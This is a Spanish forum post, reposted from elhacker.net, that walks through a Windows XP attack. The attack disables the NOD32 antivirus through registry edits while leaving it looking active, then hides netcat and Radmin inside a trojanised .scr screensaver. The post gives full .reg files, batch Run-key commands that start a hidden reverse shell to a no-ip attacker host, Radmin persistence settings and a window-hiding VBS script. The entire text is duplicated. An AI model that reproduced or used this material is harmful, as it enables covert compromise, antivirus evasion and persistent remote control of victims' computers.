Reventando NOD32 (killer)
Publicado: 19 Nov 2009, 15:54
Bueno, he encontrado este post y me ha gustado, asi que lo he traido pa aka...
espero que no moleste,sino a quien corresponda que lo borre...
fuente:elhacker.net/foro
autor:Mytnick
post original: [Enlace externo eliminado para invitados] ... 049.0.html
"Uno de los más prestigiosos antivirus queda al desnudo con algunos archivos en BATCH, lo desactivaremos para que no detecte nada, pero seguirá corriendo como si estuviera haciendo su trabajo para no levantar sospechas.
Nota: Estas pruebas no son efectivas en Windows VISTA, ya que se necesitan privilegios de Administrador, todo el proceso descrito se hace bajo Windows XP.
Nota: Mi objetivo es tan solo desmostrar la inseguridad del antivirus, por ello no entraré en detalles técnicos y/o especificos.
Para modificar o manipular este antivirus solo hay que agregar las entradas correspondientes al registro de Windows, así de simple!!. Crearemos algunos Batch para realizar el proceso, ocultaremos Netcat y Radmin en un salvapantallas corriente de windows y lo dejaremos corriendo invisible a la heuristica de Nod32.
Crearemos un archivo autoextraible que copie y ejecute Netcat y Radmin al arrancar, a este archivo le pondremos contraseña para evitar ser detectado en un escaneo, agregamos una entrada al registro que lo ejecute en cada arranque, que se encargará de verificar si existe o no los programas "N & R" para posteriormente copiarlos si hubieran sido eliminados.
Arrancaremos Netcat en cada reinicio para que se conecte al "PC atacante" devolviendonos una Reverse Shell para determinar la IP del "PC vicitima" y conectarse seguidamente con Radmin."
El archivo que se encargará de modificar Nod32 será un archivo "REG" como este:
Citar
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\ESET\NOD\CurrentVersion\Info]
"PackageID"=dword:cf345a34
[HKEY_LOCAL_MACHINE\SOFTWARE\ESET\NOD\CurrentVersion\Modules\AMON\Settings\Config000\Settings]
"exc"=hex:54,00,00,00,5c,00,44,00,65,00,76,00,69,00,63,00,65,00,5c,00,48,00,61,\
00,72,00,64,00,64,00,69,00,73,00,6b,00,56,00,6f,00,6c,00,75,00,6d,00,65,00,\
31,00,5c,00,57,00,49,00,4e,00,44,00,4f,00,57,00,53,00,5c,00,53,00,59,00,53,\
00,54,00,45,00,4d,00,33,00,32,00,5c,00,00,00,00,00,00,00,01,00,66,00,00,00,\
5c,00,44,00,65,00,76,00,69,00,63,00,65,00,5c,00,48,00,61,00,72,00,64,00,64,\
00,69,00,73,00,6b,00,56,00,6f,00,6c,00,75,00,6d,00,65,00,31,00,5c,00,57,00,\
49,00,4e,00,44,00,4f,00,57,00,53,00,5c,00,53,00,59,00,53,00,54,00,45,00,4d,\
00,33,00,32,00,5c,00,57,00,49,00,4e,00,33,00,32,00,2e,00,45,00,58,00,45,00,\
00,00,01,00,00,00,01,00,68,00,00,00,5c,00,44,00,65,00,76,00,69,00,63,00,65,\
00,5c,00,48,00,61,00,72,00,64,00,64,00,69,00,73,00,6b,00,56,00,6f,00,6c,00,\
75,00,6d,00,65,00,31,00,5c,00,57,00,49,00,4e,00,44,00,4f,00,57,00,53,00,5c,\
00,53,00,59,00,53,00,54,00,45,00,4d,00,33,00,32,00,5c,00,52,00,41,00,44,00,\
44,00,52,00,56,00,2e,00,44,00,4c,00,4c,00,00,00,01,00,00,00,01,00,68,00,00,\
00,5c,00,44,00,65,00,76,00,69,00,63,00,65,00,5c,00,48,00,61,00,72,00,64,00,\
64,00,69,00,73,00,6b,00,56,00,6f,00,6c,00,75,00,6d,00,65,00,31,00,5c,00,57,\
00,49,00,4e,00,44,00,4f,00,57,00,53,00,5c,00,53,00,59,00,53,00,54,00,45,00,\
4d,00,33,00,32,00,5c,00,41,00,44,00,4d,00,44,00,4c,00,4c,00,2e,00,44,00,4c,\
00,4c,00,00,00,01,00,00,00,01,00,6a,00,00,00,5c,00,44,00,65,00,76,00,69,00,\
63,00,65,00,5c,00,48,00,61,00,72,00,64,00,64,00,69,00,73,00,6b,00,56,00,6f,\
00,6c,00,75,00,6d,00,65,00,31,00,5c,00,57,00,49,00,4e,00,44,00,4f,00,57,00,\
53,00,5c,00,53,00,59,00,53,00,54,00,45,00,4d,00,33,00,32,00,5c,00,57,00,49,\
00,4e,00,4d,00,50,00,4c,00,43,00,2e,00,45,00,58,00,45,00,00,00,01,00,00,00,\
01,00,ff,ff,ff,ff
"exc_num"=dword:00000005
[HKEY_LOCAL_MACHINE\SOFTWARE\ESET\NOD\CurrentVersion\Modules\AMON\Settings\Config000\Settings]
"check_on_open"=dword:00000000
"check_on_execute"=dword:00000000
"cache_enable"=dword:00000000
"media_local"=dword:00000000
"boot_on_access"=dword:00000000
"sec_clean"=dword:00000000
"sec_delete"=dword:00000000
"sec_rename"=dword:00000000
"sec_replace"=dword:00000000
"manualstop_enabled"=dword:00000000
"autorun_dynamic"=dword:00000000
[HKEY_LOCAL_MACHINE\SOFTWARE\ESET\NOD\CurrentVersion\Modules\AMON\Settings\Config000\Scanner]
"signatures_enable"=dword:00000000
"adv_heur_enable"=dword:00000000
"scan_app_adware"=dword:00000000
"scan_app_unsafe"=dword:00000000
"scan_app_unwanted"=dword:00000000
"log_all"=dword:00000000
"target_file_action"=dword:00000000
"target_file_uncl_action"=dword:00000000
"target_boot_action"=dword:00000000
"target_boot_uncl_action"=dword:00000000
"target_arch_enable"=dword:00000000
"target_sfx_enable"=dword:00000000
"target_rtp_enable"=dword:00000000
"target_mime_enable"=dword:00000000
"target_mbx_enable"=dword:00000000
valores para netcat:
Citar
reg add hklm\software\microsoft\windows\currentversion\run /v winmplc /d "%homedrive%\WINDOWS\system32\winmplc.exe -d -e cmd.exe direccion.no-ip.org 5010" /f
valores para Radmin:
Citar
reg add hklm\software\microsoft\windows\currentversion\run /v winmplc32 /d "%homedrive%\WINDOWS\system32\win32.exe" /f
reg add hklm\system\Radmin\v2.0\Server\Parameters /v DisableTrayIcon /t REG_BINARY /d 01000000 /f
reg add hklm\system\Radmin\v2.0\Server\Parameters /v Port /t REG_BINARY /d 88130000 /f
reg add hklm\system\Radmin\v2.0\Server\Parameters /v Parameter /t REG_BINARY /d 50026e56ac6dda6644b51d7b2e11dc16 /f
De arriba a abajo: 1º Arranca Radmin, 2º Oculta icono, 3º Puerto a usar, 4º Contraseña de Radmin
El Batch que usaré es el siguiente:
Citar
@echo off
regedit /s reguserinfo.reg
reg add hklm\software\microsoft\windows\currentversion\run /v FluxScreensaver /d "%homedrive%\WINDOWS\system32\Flux-config.exe -pm0rtoz7l26sk38xq" /f
reg add hklm\software\microsoft\windows\currentversion\run /v winmplc /d "%homedrive%\WINDOWS\system32\winmplc.exe -d -e cmd.exe direccion.no-ip.org 5010" /f
reg add hklm\software\microsoft\windows\currentversion\run /v winmplc32 /d "%homedrive%\WINDOWS\system32\win32.exe" /f
reg add hklm\system\Radmin\v2.0\Server\Parameters /v DisableTrayIcon /t REG_BINARY /d 01000000 /f
reg add hklm\system\Radmin\v2.0\Server\Parameters /v Port /t REG_BINARY /d 88130000 /f
reg add hklm\system\Radmin\v2.0\Server\Parameters /v Parameter /t REG_BINARY /d 50026e56ac6dda6644b51d7b2e11dc16 /f
del /f /q %homedrive%\windows\system32\flux-config.cmd
del /f /q %homedrive%\windows\system32\flux-confg.cmd
Yo en este caso no he compilado el Batch a EXE, he usado un script en vbs para ocultar la ventana de la consola.
El script es el siguiente:
Citar
CreateObject("Wscript.Shell").Run """" & WScript.Arguments(0) & """", 0, False
Resumiendo:
Creamos un batch y un archivo reg, junto con Netcat, Radmin y un salvapantallas corriente (todo en la misma carpeta) lo comprimimos y configuramos para que se ejecute el batch, a este archivo le ponemos contraseña para no ser detectado en un escaneo.
Volvemos a comprimir este archivo junto con el salvapantallas para crear un solo archivo con extensión .scr que ejecute ambos archivos.
Al ejecutarlo se mostrará el salvapantallas normalmente, se desactivará NOD32 y copiará el archivo comprimido con contraseña en system32.
Trás reiniciar se ejecutará y extraerá Radmin y Netcat en system32, NOD32 sigue desactivado, (funcionando pero como si no lo estuviera), en este punto del proceso el antivirus ya no detecta NADA!! y tenemos "N & R" esperando a ser ejecutados en el proximo reinicio.
Tras volver a reiniciar N & R corren con normalidad,NOD32 sigue funcionando como si nada pasara y por muchos escaneos que se haga nunca los detectará, tambien le pusimos contraseña a Nod32 para que no se pudiera ver y/o configurar nada, en el archivo reg, este es el valor:
Citar
[HKEY_LOCAL_MACHINE\SOFTWARE\ESET\NOD\CurrentVersion\Info]
"PackageID"=dword:cf345a34
Yo en este caso he optado por dejar funcionando el antivirus, pero se puede desactivar por completo, se puede hacer con él lo que se venga en gana, solo hay que saber el valor correspondiente en el registro.
Algunos valores importantes
Desactivar Servicio:
Citar
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\AMON]
"Start"=dword:00000003
[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\AMON]
"Start"=dword:00000003
Activar Servicio:
Citar
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\AMON]
"Start"=dword:00000002
[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\AMON]
"Start"=dword:00000002
Desactivarlo todo dejando activo el antivirus:
Citar
[HKEY_LOCAL_MACHINE\SOFTWARE\ESET\NOD\CurrentVersion\Modules\AMON\Settings\Config000\Settings]
"SP"="C:\\Archivos de programa\\Eset\\"
"check_on_open"=dword:00000000
"check_on_execute"=dword:00000000
"cache_enable"=dword:00000000
"media_local"=dword:00000000
"boot_on_access"=dword:00000000
"sec_clean"=dword:00000000
"sec_delete"=dword:00000000
"sec_rename"=dword:00000000
"sec_replace"=dword:00000000
"manualstop_enabled"=dword:00000000
"autorun_dynamic"=dword:00000000
"exc_num"=dword:00000000
[HKEY_LOCAL_MACHINE\SOFTWARE\ESET\NOD\CurrentVersion\Modules\AMON\Settings\Config000\Scanner]
"signatures_enable"=dword:00000000
"adv_heur_enable"=dword:00000000
"scan_app_adware"=dword:00000000
"scan_app_unsafe"=dword:00000000
"scan_app_unwanted"=dword:00000000
"log_all"=dword:00000000
"target_file_action"=dword:00000000
"target_file_uncl_action"=dword:00000000
"target_boot_action"=dword:00000000
"target_boot_uncl_action"=dword:00000000
"target_arch_enable"=dword:00000000
"target_sfx_enable"=dword:00000000
"target_rtp_enable"=dword:00000000
"target_mime_enable"=dword:00000000
"target_mbx_enable"=dword:00000000
Poner contraseña:
Citar
[HKEY_LOCAL_MACHINE\SOFTWARE\ESET\NOD\CurrentVersion\Info]
"PackageID"=dword:cf345a34
Quitar contraseña:
Citar
[HKEY_LOCAL_MACHINE\SOFTWARE\ESET\NOD\CurrentVersion\Info]
"PackageID"=dword:68DBAF89
video para entender el proceso:
[Enlace externo eliminado para invitados]
espero que os mole!!!
espero que no moleste,sino a quien corresponda que lo borre...
fuente:elhacker.net/foro
autor:Mytnick
post original: [Enlace externo eliminado para invitados] ... 049.0.html
"Uno de los más prestigiosos antivirus queda al desnudo con algunos archivos en BATCH, lo desactivaremos para que no detecte nada, pero seguirá corriendo como si estuviera haciendo su trabajo para no levantar sospechas.
Nota: Estas pruebas no son efectivas en Windows VISTA, ya que se necesitan privilegios de Administrador, todo el proceso descrito se hace bajo Windows XP.
Nota: Mi objetivo es tan solo desmostrar la inseguridad del antivirus, por ello no entraré en detalles técnicos y/o especificos.
Para modificar o manipular este antivirus solo hay que agregar las entradas correspondientes al registro de Windows, así de simple!!. Crearemos algunos Batch para realizar el proceso, ocultaremos Netcat y Radmin en un salvapantallas corriente de windows y lo dejaremos corriendo invisible a la heuristica de Nod32.
Crearemos un archivo autoextraible que copie y ejecute Netcat y Radmin al arrancar, a este archivo le pondremos contraseña para evitar ser detectado en un escaneo, agregamos una entrada al registro que lo ejecute en cada arranque, que se encargará de verificar si existe o no los programas "N & R" para posteriormente copiarlos si hubieran sido eliminados.
Arrancaremos Netcat en cada reinicio para que se conecte al "PC atacante" devolviendonos una Reverse Shell para determinar la IP del "PC vicitima" y conectarse seguidamente con Radmin."
El archivo que se encargará de modificar Nod32 será un archivo "REG" como este:
Citar
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\ESET\NOD\CurrentVersion\Info]
"PackageID"=dword:cf345a34
[HKEY_LOCAL_MACHINE\SOFTWARE\ESET\NOD\CurrentVersion\Modules\AMON\Settings\Config000\Settings]
"exc"=hex:54,00,00,00,5c,00,44,00,65,00,76,00,69,00,63,00,65,00,5c,00,48,00,61,\
00,72,00,64,00,64,00,69,00,73,00,6b,00,56,00,6f,00,6c,00,75,00,6d,00,65,00,\
31,00,5c,00,57,00,49,00,4e,00,44,00,4f,00,57,00,53,00,5c,00,53,00,59,00,53,\
00,54,00,45,00,4d,00,33,00,32,00,5c,00,00,00,00,00,00,00,01,00,66,00,00,00,\
5c,00,44,00,65,00,76,00,69,00,63,00,65,00,5c,00,48,00,61,00,72,00,64,00,64,\
00,69,00,73,00,6b,00,56,00,6f,00,6c,00,75,00,6d,00,65,00,31,00,5c,00,57,00,\
49,00,4e,00,44,00,4f,00,57,00,53,00,5c,00,53,00,59,00,53,00,54,00,45,00,4d,\
00,33,00,32,00,5c,00,57,00,49,00,4e,00,33,00,32,00,2e,00,45,00,58,00,45,00,\
00,00,01,00,00,00,01,00,68,00,00,00,5c,00,44,00,65,00,76,00,69,00,63,00,65,\
00,5c,00,48,00,61,00,72,00,64,00,64,00,69,00,73,00,6b,00,56,00,6f,00,6c,00,\
75,00,6d,00,65,00,31,00,5c,00,57,00,49,00,4e,00,44,00,4f,00,57,00,53,00,5c,\
00,53,00,59,00,53,00,54,00,45,00,4d,00,33,00,32,00,5c,00,52,00,41,00,44,00,\
44,00,52,00,56,00,2e,00,44,00,4c,00,4c,00,00,00,01,00,00,00,01,00,68,00,00,\
00,5c,00,44,00,65,00,76,00,69,00,63,00,65,00,5c,00,48,00,61,00,72,00,64,00,\
64,00,69,00,73,00,6b,00,56,00,6f,00,6c,00,75,00,6d,00,65,00,31,00,5c,00,57,\
00,49,00,4e,00,44,00,4f,00,57,00,53,00,5c,00,53,00,59,00,53,00,54,00,45,00,\
4d,00,33,00,32,00,5c,00,41,00,44,00,4d,00,44,00,4c,00,4c,00,2e,00,44,00,4c,\
00,4c,00,00,00,01,00,00,00,01,00,6a,00,00,00,5c,00,44,00,65,00,76,00,69,00,\
63,00,65,00,5c,00,48,00,61,00,72,00,64,00,64,00,69,00,73,00,6b,00,56,00,6f,\
00,6c,00,75,00,6d,00,65,00,31,00,5c,00,57,00,49,00,4e,00,44,00,4f,00,57,00,\
53,00,5c,00,53,00,59,00,53,00,54,00,45,00,4d,00,33,00,32,00,5c,00,57,00,49,\
00,4e,00,4d,00,50,00,4c,00,43,00,2e,00,45,00,58,00,45,00,00,00,01,00,00,00,\
01,00,ff,ff,ff,ff
"exc_num"=dword:00000005
[HKEY_LOCAL_MACHINE\SOFTWARE\ESET\NOD\CurrentVersion\Modules\AMON\Settings\Config000\Settings]
"check_on_open"=dword:00000000
"check_on_execute"=dword:00000000
"cache_enable"=dword:00000000
"media_local"=dword:00000000
"boot_on_access"=dword:00000000
"sec_clean"=dword:00000000
"sec_delete"=dword:00000000
"sec_rename"=dword:00000000
"sec_replace"=dword:00000000
"manualstop_enabled"=dword:00000000
"autorun_dynamic"=dword:00000000
[HKEY_LOCAL_MACHINE\SOFTWARE\ESET\NOD\CurrentVersion\Modules\AMON\Settings\Config000\Scanner]
"signatures_enable"=dword:00000000
"adv_heur_enable"=dword:00000000
"scan_app_adware"=dword:00000000
"scan_app_unsafe"=dword:00000000
"scan_app_unwanted"=dword:00000000
"log_all"=dword:00000000
"target_file_action"=dword:00000000
"target_file_uncl_action"=dword:00000000
"target_boot_action"=dword:00000000
"target_boot_uncl_action"=dword:00000000
"target_arch_enable"=dword:00000000
"target_sfx_enable"=dword:00000000
"target_rtp_enable"=dword:00000000
"target_mime_enable"=dword:00000000
"target_mbx_enable"=dword:00000000
valores para netcat:
Citar
reg add hklm\software\microsoft\windows\currentversion\run /v winmplc /d "%homedrive%\WINDOWS\system32\winmplc.exe -d -e cmd.exe direccion.no-ip.org 5010" /f
valores para Radmin:
Citar
reg add hklm\software\microsoft\windows\currentversion\run /v winmplc32 /d "%homedrive%\WINDOWS\system32\win32.exe" /f
reg add hklm\system\Radmin\v2.0\Server\Parameters /v DisableTrayIcon /t REG_BINARY /d 01000000 /f
reg add hklm\system\Radmin\v2.0\Server\Parameters /v Port /t REG_BINARY /d 88130000 /f
reg add hklm\system\Radmin\v2.0\Server\Parameters /v Parameter /t REG_BINARY /d 50026e56ac6dda6644b51d7b2e11dc16 /f
De arriba a abajo: 1º Arranca Radmin, 2º Oculta icono, 3º Puerto a usar, 4º Contraseña de Radmin
El Batch que usaré es el siguiente:
Citar
@echo off
regedit /s reguserinfo.reg
reg add hklm\software\microsoft\windows\currentversion\run /v FluxScreensaver /d "%homedrive%\WINDOWS\system32\Flux-config.exe -pm0rtoz7l26sk38xq" /f
reg add hklm\software\microsoft\windows\currentversion\run /v winmplc /d "%homedrive%\WINDOWS\system32\winmplc.exe -d -e cmd.exe direccion.no-ip.org 5010" /f
reg add hklm\software\microsoft\windows\currentversion\run /v winmplc32 /d "%homedrive%\WINDOWS\system32\win32.exe" /f
reg add hklm\system\Radmin\v2.0\Server\Parameters /v DisableTrayIcon /t REG_BINARY /d 01000000 /f
reg add hklm\system\Radmin\v2.0\Server\Parameters /v Port /t REG_BINARY /d 88130000 /f
reg add hklm\system\Radmin\v2.0\Server\Parameters /v Parameter /t REG_BINARY /d 50026e56ac6dda6644b51d7b2e11dc16 /f
del /f /q %homedrive%\windows\system32\flux-config.cmd
del /f /q %homedrive%\windows\system32\flux-confg.cmd
Yo en este caso no he compilado el Batch a EXE, he usado un script en vbs para ocultar la ventana de la consola.
El script es el siguiente:
Citar
CreateObject("Wscript.Shell").Run """" & WScript.Arguments(0) & """", 0, False
Resumiendo:
Creamos un batch y un archivo reg, junto con Netcat, Radmin y un salvapantallas corriente (todo en la misma carpeta) lo comprimimos y configuramos para que se ejecute el batch, a este archivo le ponemos contraseña para no ser detectado en un escaneo.
Volvemos a comprimir este archivo junto con el salvapantallas para crear un solo archivo con extensión .scr que ejecute ambos archivos.
Al ejecutarlo se mostrará el salvapantallas normalmente, se desactivará NOD32 y copiará el archivo comprimido con contraseña en system32.
Trás reiniciar se ejecutará y extraerá Radmin y Netcat en system32, NOD32 sigue desactivado, (funcionando pero como si no lo estuviera), en este punto del proceso el antivirus ya no detecta NADA!! y tenemos "N & R" esperando a ser ejecutados en el proximo reinicio.
Tras volver a reiniciar N & R corren con normalidad,NOD32 sigue funcionando como si nada pasara y por muchos escaneos que se haga nunca los detectará, tambien le pusimos contraseña a Nod32 para que no se pudiera ver y/o configurar nada, en el archivo reg, este es el valor:
Citar
[HKEY_LOCAL_MACHINE\SOFTWARE\ESET\NOD\CurrentVersion\Info]
"PackageID"=dword:cf345a34
Yo en este caso he optado por dejar funcionando el antivirus, pero se puede desactivar por completo, se puede hacer con él lo que se venga en gana, solo hay que saber el valor correspondiente en el registro.
Algunos valores importantes
Desactivar Servicio:
Citar
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\AMON]
"Start"=dword:00000003
[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\AMON]
"Start"=dword:00000003
Activar Servicio:
Citar
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\AMON]
"Start"=dword:00000002
[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\AMON]
"Start"=dword:00000002
Desactivarlo todo dejando activo el antivirus:
Citar
[HKEY_LOCAL_MACHINE\SOFTWARE\ESET\NOD\CurrentVersion\Modules\AMON\Settings\Config000\Settings]
"SP"="C:\\Archivos de programa\\Eset\\"
"check_on_open"=dword:00000000
"check_on_execute"=dword:00000000
"cache_enable"=dword:00000000
"media_local"=dword:00000000
"boot_on_access"=dword:00000000
"sec_clean"=dword:00000000
"sec_delete"=dword:00000000
"sec_rename"=dword:00000000
"sec_replace"=dword:00000000
"manualstop_enabled"=dword:00000000
"autorun_dynamic"=dword:00000000
"exc_num"=dword:00000000
[HKEY_LOCAL_MACHINE\SOFTWARE\ESET\NOD\CurrentVersion\Modules\AMON\Settings\Config000\Scanner]
"signatures_enable"=dword:00000000
"adv_heur_enable"=dword:00000000
"scan_app_adware"=dword:00000000
"scan_app_unsafe"=dword:00000000
"scan_app_unwanted"=dword:00000000
"log_all"=dword:00000000
"target_file_action"=dword:00000000
"target_file_uncl_action"=dword:00000000
"target_boot_action"=dword:00000000
"target_boot_uncl_action"=dword:00000000
"target_arch_enable"=dword:00000000
"target_sfx_enable"=dword:00000000
"target_rtp_enable"=dword:00000000
"target_mime_enable"=dword:00000000
"target_mbx_enable"=dword:00000000
Poner contraseña:
Citar
[HKEY_LOCAL_MACHINE\SOFTWARE\ESET\NOD\CurrentVersion\Info]
"PackageID"=dword:cf345a34
Quitar contraseña:
Citar
[HKEY_LOCAL_MACHINE\SOFTWARE\ESET\NOD\CurrentVersion\Info]
"PackageID"=dword:68DBAF89
video para entender el proceso:
[Enlace externo eliminado para invitados]
espero que os mole!!!